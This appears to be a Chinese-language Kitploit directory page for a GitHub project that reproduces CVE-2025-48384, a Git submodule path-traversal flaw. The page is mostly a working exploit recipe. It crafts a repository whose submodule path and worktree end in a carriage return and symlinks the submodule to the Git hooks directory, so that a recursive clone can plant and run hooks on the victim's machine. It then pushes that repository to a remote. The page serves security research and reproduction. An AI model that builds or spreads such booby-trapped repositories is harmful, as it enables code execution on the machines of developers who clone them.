Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-48384-test — 复现 CVE-2025-48384,演示 Git 子模块路径遍历漏洞,并附带可重现该漏洞利用的逐步命令。 | Kitploit
工具/GitHubGitHub/beishanxueyuan/cve-2025-48384-test
漏洞分析代码分析漏洞利用供应链安全
GitHubbeishanxueyuan/cve-2025-48384-test

CVE-2025-48384-test

复现 CVE-2025-48384,演示 Git 子模块路径遍历漏洞,并附带可重现该漏洞利用的逐步命令。

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

复现命令行

root@kitploit:~
git clone --recursive https://github.com/beishanxueyuan/CVE-2025-48384-test.git

修改指向的GitHub仓库

root@kitploit:~
git init repo
git -C repo -c protocol.file.allow=always submodule add https://github.com/beishanxueyuan/CVE-2025-48384.git sub
git -C repo mv sub $(printf "sub\r")

git config unset -f repo/.gitmodules submodule.sub.path
printf "\tpath = \"sub\r\"\n" >> repo/.gitmodules

git config unset -f repo/.git/modules/sub/config core.worktree
printf "[core]\n\tworktree = \"../../../sub\r\"\n" >> repo/.git/modules/sub/config

ln -s .git/modules/sub/hooks repo/sub
git -C repo add -A
git -C repo commit -m submodule

cd repo/

git branch -M main
git remote add origin https://github.com/beishanxueyuan/CVE-2025-48384-test.git
下载工具